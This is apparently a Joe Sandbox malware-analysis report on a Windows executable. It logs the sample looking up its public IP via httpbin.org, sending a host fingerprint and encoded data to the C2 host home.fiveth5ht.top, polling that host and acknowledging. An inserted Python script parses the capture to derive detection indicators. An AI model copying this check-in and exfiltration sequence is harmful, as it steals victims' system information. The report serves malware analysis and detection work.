| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 27, 2024 08:38:10.430349112 CET | 1.1.1.1 | 192.168.2.7 | 0x4056 | No error (0) | httpbin.org | | 3.218.7.103 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:38:10.430349112 CET | 1.1.1.1 | 192.168.2.7 | 0x4056 | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:38:16.353653908 CET | 1.1.1.1 | 192.168.2.7 | 0x9e53 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:38:21.298346996 CET | 1.1.1.1 | 192.168.2.7 | 0x3529 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:38:23.106152058 CET | 1.1.1.1 | 192.168.2.7 | 0x3088 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false |
                                • httpbin.org
                                • home.fiveth5ht.top
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.7 | 49702 | 5.101.3.217 | 80 | 1008 | C:\Users\user\Desktop\w6cYYyWXqJ.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Dec 27, 2024 08:38:16.491507053 CET | 12360 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 |

    Host: home.fiveth5ht.top
    Accept: */*
    Content-Type: application/json
    Content-Length: 561951
                                Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652913985891", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
                                Dec 27, 2024 08:38:16.611265898 CET4944OUTData Raw: 4b 4d 42 77 74 66 71 4f 45 78 6d 45 78 39 43 6e 69 73 44 69 73 50 6a 4d 4e 56 56 36 57 4a 77 6c 61 6e 69 4b 46 52 62 58 70 31 71 4d 70 30 35 71 2b 6c 34 79 5a 2b 54 59 33 41 34 33 4c 63 54 55 77 65 59 34 50 46 59 44 47 55 58 79 31 73 4c 6a 63 50
                                Data Ascii: KMBwtfqOExmEx9CnisDisPjMNVV6WJwlaniKFRbXp1qMp05q+l4yZ+TY3A43LcTUweY4PFYDGUXy1sLjcPWwuJpNq9qlCvCnVg7a2lFOw1\/un8P5ioatbWYZ5+p\/+uajf7p\/D+YroOUhoqXaf7x\/z+NPoAi2H2\/z+FGw+3+fwr9Y9N\/4JS\/EPVNP0bUrX4g2tza63pmmanbTWXg2+u4Ik1O0iuoobiVddQW8qeaIGM6w
                                Dec 27, 2024 08:38:16.611382961 CET4944OUTData Raw: 2f 39 4d 5c 2f 38 41 58 2b 64 37 5c 2f 77 44 36 5c 2f 77 44 43 6d 62 58 77 47 52 34 30 68 38 33 5c 2f 41 46 58 45 38 5c 2f 38 41 6b 5c 2f 6e 5c 2f 41 43 70 5c 2f 54 5a 38 5c 2f 6c 79 78 34 5c 2f 64 5c 2f 38 39 76 78 5c 2f 54 72 2b 6e 46 44 65 59
                                Data Ascii: /9M\/8AX+d7\/wD6\/wDCmbXwGR40h83\/AFXE8\/8Ak\/n\/ACp\/TZ8\/lyx4\/d\/89vx\/Tr+nFDeYI0d\/ueV\/yzi\/1P8AnoKDoK0myTfsOxPL82LP7\/8Aznv71N96Rkd408w8R\/6\/tz\/k8iiI7o3m2bE\/13J\/5ePp\/X+dG15Mb0+frn\/21\/n\/AEoNKfX5ELbPk2eZs83yvs\/\/AC3wf8+vPfNH+r2Jv\
                                Dec 27, 2024 08:38:16.611540079 CET4944OUTData Raw: 62 65 47 66 43 65 72 65 44 66 44 33 68 74 64 63 38 54 2b 4c 4e 44 5c 2f 77 43 45 61 30 62 53 64 63 38 63 5c 2f 45 54 56 6d 30 2b 77 50 68 6b 33 4e 74 63 58 33 69 61 35 6d 45 56 38 74 6d 49 31 53 7a 53 57 62 39 66 62 6a 39 74 62 77 68 44 34 44 2b
                                Data Ascii: beGfCereDfD3htdc8T+LND\/wCEa0bSdc8c\/ETVm0+wPhk3NtcX3ia5mEV8tmI1SzSWb9fbj9tbwhD4D+D+uP8A8FR\/Ki8XeBNZ1218Wf8ADEupyf8ACxobP4s\/E7wq3iv+wR4VLeEP7MufDVx8Pv7CkitnvP8AhBv+EsELR+JkuJ\/iv\/gtyCf2q\/h9gf8ANvnhX\/1Y\/wAV6\/rX6IGbYmHj1wfhsFisRh8PmGG4iwu
                                Dec 27, 2024 08:38:16.611560106 CET2472OUTData Raw: 5c 2f 50 76 6e 6d 69 56 58 58 35 33 53 4f 48 7a 50 2b 65 6e 37 38 5c 2f 35 5c 2f 7a 37 30 5c 2f 63 38 55 65 5c 2f 77 41 37 5a 35 63 76 6c 64 5c 2f 50 6d 37 56 6f 62 45 50 50 37 6c 49 30 6b 66 66 36 38 66 70 5c 2f 39 65 71 32 37 79 7a 5c 2f 41 4d
                                Data Ascii: \/PvnmiVXX53SOHzP+en78\/5\/z70\/c8Ue\/wA7Z5cvld\/Pm7VobEPP7lI0kff68fp\/9eq27yz\/AM9vL5\/6Yd\/z\/L9cVN8nluu\/182PyvJ\/L\/P4UfO2+Hp+9\/55df1+nSp9\/wDu\/iBC399fL\/56+XJN\/qv+nX\/Pr6UeX+7mT94iTxfu8fl\/+v8A\/XU23zFL7N8Mn+q9P\/AT36evpVXcm3+DZH+98v8A
                                Dec 27, 2024 08:38:16.611640930 CET7416OUTData Raw: 79 4c 4d 73 54 51 71 52 77 57 59 55 63 52 68 71 4f 46 78 64 66 43 34 47 6e 68 63 56 7a 79 72 79 2b 71 56 61 55 70 55 4e 4b 4d 6a 5c 2f 54 33 36 48 5c 2f 41 4e 66 78 50 38 4e 33 6a 73 6f 7a 57 4f 52 38 55 63 47 5a 74 78 64 6b 47 42 7a 57 46 66 42
                                Data Ascii: yLMsTQqRwWYUcRhqOFxdfC4GnhcVzyry+qVaUpUNKMj\/T36H\/ANfxP8N3jsozWOR8UcGZtxdkGBzWFfBVKmFwfEOWYHGUqmMy2vQxVfFYSjjMwrYjCONPDweKo4inHEJutE\/NT9in4mfE34jeC\/jCPEuj6Rp3w50C9Ww+HA0fRdI8P2emLMmrX2r+HY7HSLGzguGsba50W7uZ2GYLm+dVaRLhVg6Kv0p8S6PpSeG9bji0+0
                                Dec 27, 2024 08:38:16.731128931 CET4944OUTData Raw: 35 5a 2b 56 5c 2f 35 4b 39 66 38 5c 2f 6a 52 4a 44 43 79 78 76 73 7a 31 5c 2f 77 41 5c 2f 35 5c 2f 58 75 65 58 49 73 61 62 30 6b 6d 54 5c 2f 57 2b 2b 66 58 72 36 66 35 50 66 50 32 66 6e 2b 48 5c 2f 42 4c 35 33 35 66 31 38 79 47 52 6e 59 75 37 76
                                Data Ascii: 5Z+V\/5K9f8\/jRJDCyxvsz1\/wA\/5\/XueXIsab0kmT\/W++fXr6f5PfP2fn+H\/BL535f18yGRnYu7vsH+r\/1Vtn\/P6f1Zt3b3dPJeT\/P0745\/pT0jG1\/3MezH8f04tf8Ar+70yTPmP\/7T\/cQen19+tZmoyPZ5h353\/wCql\/8Akr8P6UwSFvnR8v8A88\/+nfHpnr0p+5PnR3+SX7P\/AMtf\/Jr+nWofnXfsTy
                                Dec 27, 2024 08:38:16.731185913 CET2472OUTData Raw: 2f 68 38 32 7a 54 4c 63 32 7a 62 4f 73 69 77 74 62 43 5a 4e 50 46 55 38 66 50 47 35 52 6a 38 54 5c 2f 5a 2b 45 71 77 6a 68 59 59 61 72 53 69 36 4b 6b 2b 46 52 42 47 6f 56 64 32 42 5c 2f 65 5a 6e 50 34 73 78 4a 50 35 30 36 6b 31 43 36 30 4b 48 53
                                Data Ascii: /h82zTLc2zbOsiwtbCZNPFU8fPG5Rj8T\/Z+EqwjhYYarSi6Kk+FRBGoVd2B\/eZnP4sxJP506k1C60KHSfh\/wCLfDHxA+HfxT+HXxTPiyz8CfEn4X6x4ovfDeq+IvAV5plp428Hanonj\/wZ8OPiR4R8V+G017w5qVzpfjHwFoA1TRPEmh694cuNa0TUI9QC1\/TWQcRZJxPl0M0yDMKGZYCVWth\/bUVUg6eIw1SVHEYetRr
                                Dec 27, 2024 08:38:16.731389046 CET4944OUTData Raw: 45 4b 64 58 32 4c 70 31 5a 52 55 4b 31 47 55 34 4b 69 66 72 2b 48 39 54 55 64 37 64 52 32 4e 6e 64 33 73 33 2b 71 73 37 61 65 36 6c 37 66 75 37 65 4a 35 58 35 50 54 35 55 50 4e 57 49 62 57 37 75 5c 2f 69 6e 38 4c 66 67 5c 2f 48 66 2b 46 6a 34 73
                                Data Ascii: EKdX2Lp1ZRUK1GU4Kifr+H9TUd7dR2Nnd3s3+qs7ae6l7fu7eJ5X5PT5UPNWIbW7u\/in8Lfg\/Hf+Fj4s+L1h+z7qXhWddZ1M6HaW\/7Sul+FtX+HieIrw+HVv7Ce3tPF2lf8JEmm6VrSWcgul0uXWUSGS49rOeKOH+HqmGpZ3muEy2pjKWOr4WGJlKMq9LLcLPG46dNRjLm+rYWnUr1F8Xs4ScVKzPnsj4R4k4koY\/FZFk+L
                                Dec 27, 2024 08:38:16.731461048 CET2472OUTData Raw: 5c 2f 36 6a 5c 2f 49 5c 2f 4f 6d 62 66 6d 66 2b 4e 50 38 5c 2f 6e 2b 66 66 33 35 44 70 68 74 38 5c 2f 30 52 54 2b 64 64 69 50 36 63 5c 2f 77 43 50 61 6f 56 5c 2f 6a 7a 6e 7a 50 2b 6d 6e 2b 66 58 50 5c 2f 77 43 71 72 6d 7a 37 5c 2f 56 33 5c 2f 41
                                Data Ascii: \/6j\/I\/Ombfmf+NP8\/n+ff35Dpht8\/0RT+ddiP6c\/wCPaoV\/jznzP+mn+fXP\/wCqrmz7\/V3\/AM\/l+XIqFYk3ImzZ\/wA9cZx\/P\/P0oOqnU\/rv5r+v+BF5f\/fefN\/Tp0\/p7VBJ+8VE++5x5v1\/P0q1\/Gfk39PX0\/zz\/SoPkLIP9d5f\/bAf8ev5fz\/Sg6SsN8f\/ACx3nn\/P+cfzzDtf5N6fJ\/n3\
                                Dec 27, 2024 08:38:16.773658037 CET27192OUTData Raw: 39 50 31 50 35 38 55 41 52 78 37 31 32 5a 54 5a 35 6e 37 72 39 35 5c 2f 68 5c 2f 68 2b 74 51 73 79 52 53 66 38 74 50 2b 65 58 66 79 50 73 5c 2f 39 63 5c 2f 7a 71 79 30 6e 38 61 47 4e 33 6b 7a 2b 37 6b 5c 2f 7a 36 66 35 37 46 6b 63 62 78 78 75 50
                                Data Ascii: 9P1P58UARx712ZTZ5n7r95\/h\/h+tQsyRSf8tP+eXfyPs\/9c\/zqy0n8aGN3kz+7k\/z6f57FkcbxxuPv95eKDoIflTZv8vZ\/zz\/l\/wDXpf3nlumz\/ll+9k83\/wAlf8\/WkjX7mxdjmXPlycf5NC\/MuzfH\/wBMvM6\/qP8AjxrT2nl+P\/AA\/X749aZeaz8H\/H2mWEfnXl5obxQRjPzuLm2fHyhj91T0Brzz44\/
                                Dec 27, 2024 08:38:21.098387003 CET | 157 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.22.1
                                Date: Fri, 27 Dec 2024 07:38:20 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 1
                                Connection: close
                                Data Raw: 30
                                Data Ascii: 0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.7 | 49713 | 5.101.3.217 | 80 | 1008 | C:\Users\user\Desktop\w6cYYyWXqJ.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Dec 27, 2024 08:38:21.419481039 CET | 98 | OUT | GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                Host: home.fiveth5ht.top
                                Accept: */*
                                Dec 27, 2024 08:38:22.896377087 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                Server: nginx/1.22.1
                                Date: Fri, 27 Dec 2024 07:38:22 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 207
                                Connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.7 | 49721 | 5.101.3.217 | 80 | 1008 | C:\Users\user\Desktop\w6cYYyWXqJ.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Dec 27, 2024 08:38:23.228013039 CET | 171 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                Host: home.fiveth5ht.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 31
                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                Data Ascii: { "id1": "0", "data": "Done1" }
                                Dec 27, 2024 08:38:24.734215975 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                Server: nginx/1.22.1
                                Date: Fri, 27 Dec 2024 07:38:24 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 207
                                Connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.7 | 49700 | 3.218.7.103 | 443 | 1008 | C:\Users\user\Desktop\w6cYYyWXqJ.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-27 07:38:12 UTC | 52 | OUT | GET /ip HTTP/1.1
                                Host: httpbin.org
                                Accept: */*
                                2024-12-27 07:38:12 UTC | 224 | IN | HTTP/1.1 200 OK
                                Date: Fri, 27 Dec 2024 07:38:12 GMT
                                Content-Type: application/json
                                Content-Length: 31
                                Connection: close
                                Server: gunicorn/19.9.0
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: true
                                2024-12-27 07:38:12 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                Data Ascii: { "origin": "8.46.123.189"}
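The three sessions above form a small check-in protocol: an external-IP lookup against httpbin.org, a JSON POST carrying the host fingerprint (public IP, CPU and RAM counts, drive sizes, display resolution, recent-file count, process list) to home.fiveth5ht.top, a GET poll on the same path with ?argument=0, and a JSON acknowledgement { "id1": "0", "data": "Done1" }. The script below is an added example, not part of the Joe Sandbox report or of the sample: it decodes the report's "Data Raw" hex fields, labels each transaction with heuristics of my own, and extracts what a detection engineer would pull from this dump: the C2 host and path, the absence of a User-Agent on every outbound request, and the reuse of the httpbin-echoed public IP inside the exfiltrated fingerprint. The sample records are constructed from the visible dump; the fingerprint body is abbreviated to the keys shown above, and the request path of the fingerprint POST is assumed to equal the later requests' path, since that header is not visible in this section.

```python
"""Reconstruct the C2 check-in sequence from the HTTP transactions in a Joe
Sandbox network dump and derive indicators from it.

Sample records are constructed from this report: host names, URIs, headers and
the two short bodies are copied from the dump; the fingerprint body is an
abbreviated reconstruction; the fingerprint POST path is assumed. Labels and
rules are the author's heuristics, not part of Joe Sandbox or of the sample."""
import json
import re

# Keys of the JSON the sample sent right after the external-IP lookup.
FINGERPRINT_KEYS = {"ip", "current_time", "Num_processor", "Num_ram", "drivers",
                    "Num_displays", "resolution_x", "resolution_y",
                    "recent_files", "processes"}
# Services that echo the caller's public IP; only httpbin.org appears here.
IP_ECHO_HOSTS = {"httpbin.org"}

C2_PATH = "/OyKvQKriwnyyWjwCxSXF1735186862"
NOT_FOUND_HTML = ("<!doctype html>\n<html lang=en>\n<title>404 Not Found</title>\n"
                  "<h1>Not Found</h1>\n<p>The requested URL was not found on the "
                  "server. If you entered the URL manually please check your "
                  "spelling and try again.</p>\n")
FINGERPRINT_BODY = json.dumps({  # abbreviated reconstruction of the observed body
    "ip": "8.46.123.189", "current_time": "8598217652913985891",
    "Num_processor": 4, "Num_ram": 7,
    "drivers": [{"name": "C:\\", "all": 223.0, "free": 168.0}],
    "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024,
    "recent_files": 50,
    "processes": [{"name": "[System Process]", "pid": 0}, {"name": "System", "pid": 4}],
})


def make_tx(ts, direction, host, line, headers, raw=""):
    """One transaction as the report shows it: request/status line, headers,
    and the body as a 'Data Raw' hex dump (empty when there was no body)."""
    return {"ts": ts, "dir": direction, "host": host, "line": line,
            "headers": headers, "raw": raw}


SAMPLE_TRANSACTIONS = [  # times in UTC, as in session 0 of the dump
    make_tx("07:38:12", "OUT", "httpbin.org", "GET /ip HTTP/1.1", {"Accept": "*/*"}),
    make_tx("07:38:12", "IN", "httpbin.org", "HTTP/1.1 200 OK",
            {"Content-Type": "application/json"},
            "7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a"),
    make_tx("07:38:16", "OUT", "home.fiveth5ht.top", f"POST {C2_PATH} HTTP/1.1",  # path assumed
            {"Accept": "*/*", "Content-Type": "application/json"},
            FINGERPRINT_BODY.encode().hex(" ")),
    make_tx("07:38:21", "OUT", "home.fiveth5ht.top", f"GET {C2_PATH}?argument=0 HTTP/1.1",
            {"Accept": "*/*"}),
    make_tx("07:38:22", "IN", "home.fiveth5ht.top", "HTTP/1.1 404 NOT FOUND",
            {"Content-Type": "text/html; charset=utf-8"}, NOT_FOUND_HTML.encode().hex(" ")),
    make_tx("07:38:23", "OUT", "home.fiveth5ht.top", f"POST {C2_PATH} HTTP/1.1",
            {"Accept": "*/*", "Content-Type": "application/json", "Content-Length": "31"},
            "7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d"),
    make_tx("07:38:24", "IN", "home.fiveth5ht.top", "HTTP/1.1 404 NOT FOUND",
            {"Content-Type": "text/html; charset=utf-8"}, NOT_FOUND_HTML.encode().hex(" ")),
]


def hex_dump_to_bytes(dump: str) -> bytes:
    """Decode a Joe Sandbox 'Data Raw' field ('7b 20 22 ...') to bytes."""
    return bytes.fromhex(re.sub(r"\s+", "", dump))


def try_json(data: bytes):
    """Return the parsed JSON value, or None when the bytes are not JSON."""
    try:
        return json.loads(data.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError):
        return None


def classify(tx: dict) -> tuple:
    """Label one transaction with a (label, detail) pair using heuristics
    written for this report's traffic."""
    body = try_json(hex_dump_to_bytes(tx["raw"]))
    if tx["dir"] == "IN":
        if isinstance(body, dict) and "origin" in body:
            return ("external_ip_echo", body["origin"])
        return ("response", tx["line"].split(" ", 1)[1])
    method, path = tx["line"].split(" ")[:2]
    if tx["host"] in IP_ECHO_HOSTS:
        return ("external_ip_lookup", tx["host"] + path)
    if isinstance(body, dict):
        hits = FINGERPRINT_KEYS & body.keys()
        if len(hits) >= 3:                     # three fingerprint keys is enough to flag
            return ("host_fingerprint_exfil", sorted(hits))
        if {"id1", "data"} <= body.keys():
            return ("task_ack", body["data"])
    if method == "GET" and "argument=" in path:
        return ("task_poll", path)
    return ("unclassified", tx["line"])


def analyze(transactions: list) -> dict:
    """Walk the capture in order and summarise the check-in sequence plus the
    indicators worth carrying into a detection rule."""
    steps = [classify(tx) for tx in transactions]
    echoed_ip = next((v for lbl, v in steps if lbl == "external_ip_echo"), None)
    fingerprint_ip = None
    for tx in transactions:
        body = try_json(hex_dump_to_bytes(tx["raw"]))
        if tx["dir"] == "OUT" and isinstance(body, dict) and "ip" in body:
            fingerprint_ip = body["ip"]
    out = [tx for tx in transactions if tx["dir"] == "OUT"]
    c2 = [tx for tx in out if tx["host"] not in IP_ECHO_HOSTS]
    return {
        "sequence": [lbl for lbl, _ in steps],
        "c2_hosts": sorted({tx["host"] for tx in c2}),
        "c2_paths": sorted({tx["line"].split(" ")[1].split("?")[0] for tx in c2}),
        "requests_without_user_agent": sum("User-Agent" not in tx["headers"] for tx in out),
        "echoed_ip_reused_in_exfil": echoed_ip is not None and echoed_ip == fingerprint_ip,
    }


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_TRANSACTIONS), indent=2))
```

The `echoed_ip_reused_in_exfil` check is the part worth keeping in a rule: a process that queries an IP-echo service and, seconds later, sends that same address inside a JSON body to a host with no User-Agent header is a pattern very few legitimate applications produce. The path token and the host name are tied to this campaign and will rotate; the sequence is more durable.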



                                Target ID: 3
                                Start time: 02:38:05
                                Start date: 27/12/2024
                                Path: C:\Users\user\Desktop\w6cYYyWXqJ.exe
                                Wow64 process (32bit): true
                                Commandline: "C:\Users\user\Desktop\w6cYYyWXqJ.exe"
                                Imagebase: 0xe80000
                                File size: 4'519'424 bytes
                                MD5 hash: 26E7C91D9FB68EF0CE54AABC0465A8B0
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Reputation: low
                                Has exited: true


                                  Execution Graph

                                  Execution Coverage: 2.2%
                                  Dynamic/Decrypted Code Coverage: 0%
                                  Signature Coverage: 17.1%
                                  Total number of Nodes: 538
                                  Total number of Limit Nodes: 95
                                  execution_graph 64095 1307830 64097 130785a 64095->64097 64096 1307866 64097->64096 64107 12112c0 64097->64107 64099 13078a6 64100 130789a 64100->64099 64101 1307950 64100->64101 64103 1307906 64100->64103 64111 120b500 localeconv localeconv 64101->64111 64104 1307944 64103->64104 64112 120b500 localeconv localeconv 64103->64112 64105 1307979 64108 12112cc 64107->64108 64113 120e050 64108->64113 64110 12112fa 64110->64100 64111->64105 64112->64105 64114 120e09d localeconv localeconv 64113->64114 64127 120e503 64113->64127 64116 120e0ce 64114->64116 64115 120e388 64119 120e1a6 64115->64119 64126 12100b8 ungetc 64115->64126 64115->64127 64116->64115 64117 120e243 64116->64117 64118 120e18e 64116->64118 64116->64119 64116->64127 64117->64119 64122 1210742 ungetc 64117->64122 64118->64119 64120 120ed90 ungetc 64118->64120 64119->64110 64120->64119 64121 1210250 ungetc 64121->64127 64122->64119 64123 12111a4 ungetc 64123->64127 64124 12108d7 ungetc 64124->64127 64125 1210e3e ungetc 64125->64127 64126->64115 64127->64117 64127->64119 64127->64121 64127->64123 64127->64124 64127->64125 64128 1210006 ungetc 64127->64128 64128->64127 64312 130f250 64320 1211360 64312->64320 64314 130f28e 64315 130f282 64315->64314 64316 1211360 2 API calls 64315->64316 64317 130f2d3 64316->64317 64319 130f2ec 64317->64319 64327 1211420 localeconv localeconv 64317->64327 64321 12113b0 64320->64321 64322 1211379 64320->64322 64324 120d1d0 2 API calls 64321->64324 64328 120d1d0 64322->64328 64326 12113d0 64324->64326 64325 1211398 64325->64315 64326->64315 64327->64319 64333 120d1ed 64328->64333 64329 120d504 localeconv 64329->64333 64330 120ca50 localeconv 64330->64333 64331 120c9c0 localeconv 64331->64333 64332 120d3ae 64332->64325 64333->64329 64333->64330 64333->64331 64333->64332 64334 120cc90 localeconv 64333->64334 64334->64333 64335 e813c9 64338 e81160 64335->64338 64337 e813a1 64338->64337 64339 1208a20 12 API calls 64338->64339 64339->64338 64340 
f35a50 64341 f35a58 64340->64341 64349 f35ea0 64340->64349 64342 f35b50 64341->64342 64353 f35b88 64341->64353 64354 f35a99 64341->64354 64346 f35eb4 64342->64346 64347 f35b7a 64342->64347 64342->64353 64343 f35e96 64379 f49480 closesocket 64343->64379 64344 f35cae 64344->64343 64356 f35da1 __WSAFDIsSet 64344->64356 64362 f4a920 64344->64362 64377 f36d50 localeconv localeconv 64344->64377 64378 f49320 closesocket 64344->64378 64380 f36f10 7 API calls 64346->64380 64366 f370a0 64347->64366 64352 f35ec2 64352->64352 64353->64344 64376 f36d50 localeconv localeconv 64353->64376 64354->64353 64355 f35be2 __WSAFDIsSet 64354->64355 64359 f370a0 8 API calls 64354->64359 64375 f36f10 7 API calls 64354->64375 64355->64354 64356->64344 64359->64354 64363 f4a944 64362->64363 64364 f4a977 send 64363->64364 64365 f4a94b 64363->64365 64364->64344 64365->64344 64367 f370ae 64366->64367 64369 f3717f 64367->64369 64373 f371a7 64367->64373 64381 f4a8c0 64367->64381 64385 f371c0 6 API calls 64367->64385 64369->64373 64386 f36d50 localeconv localeconv 64369->64386 64371 f3719f 64387 f49320 closesocket 64371->64387 64373->64353 64375->64354 64376->64353 64377->64344 64378->64344 64379->64349 64380->64352 64382 f4a8e6 64381->64382 64383 f4a903 recvfrom 64381->64383 64382->64383 64384 f4a8ed 64382->64384 64383->64384 64384->64367 64385->64367 64386->64371 64387->64373 64129 e9d5e0 64130 e9d5f0 64129->64130 64131 e9d652 WSAStartup 64129->64131 64134 e9d67c 64130->64134 64136 e9d690 localeconv localeconv 64130->64136 64131->64130 64133 e9d664 64131->64133 64135 e9d5fa 64136->64135 64388 ebb3c0 64389 ebb3cb 64388->64389 64390 ebb3ee 64388->64390 64394 e876a0 64389->64394 64405 eb9290 64389->64405 64391 ebb3ea 64395 e876c0 64394->64395 64396 e876e6 send 64394->64396 64395->64396 64397 e876c9 64395->64397 64398 e876d3 64396->64398 64404 e87704 64396->64404 64397->64398 64399 e8770b 64397->64399 64419 e872a0 localeconv localeconv 64398->64419 64420 e872a0 localeconv localeconv 64399->64420 
64402 e8771c 64421 e8cb20 localeconv localeconv 64402->64421 64404->64391 64406 e876a0 3 API calls 64405->64406 64407 eb92e5 64406->64407 64408 eb92f3 64407->64408 64409 eb93c3 64407->64409 64413 eb9392 64408->64413 64414 eb9335 WSAIoctl 64408->64414 64409->64413 64422 e9d090 localeconv localeconv 64409->64422 64411 eb93be 64411->64391 64412 eb93f7 64423 ec4f40 localeconv localeconv 64412->64423 64413->64411 64424 ec50a0 localeconv localeconv 64413->64424 64414->64413 64417 eb9366 64414->64417 64417->64413 64418 eb9371 setsockopt 64417->64418 64418->64413 64419->64404 64420->64402 64421->64404 64422->64412 64423->64413 64424->64411 64425 ebe400 64426 ebe412 64425->64426 64428 ebe459 64425->64428 64427 ebe422 64426->64427 64449 ed3030 localeconv localeconv 64426->64449 64450 ee09d0 localeconv localeconv 64427->64450 64432 ebe4a8 64428->64432 64436 ebe495 64428->64436 64437 ebb5a0 64428->64437 64433 ebe42b 64451 eb68b0 closesocket localeconv localeconv 64433->64451 64435 ebb5a0 2 API calls 64435->64432 64436->64432 64436->64435 64438 ebb5c0 64437->64438 64448 ebb5d2 64437->64448 64439 ebb713 64438->64439 64441 ebb626 64438->64441 64438->64448 64453 ec4f40 localeconv localeconv 64439->64453 64442 ebb65a 64441->64442 64443 ebb72b 64441->64443 64445 ebb737 64441->64445 64441->64448 64452 ec50a0 localeconv localeconv 64441->64452 64442->64443 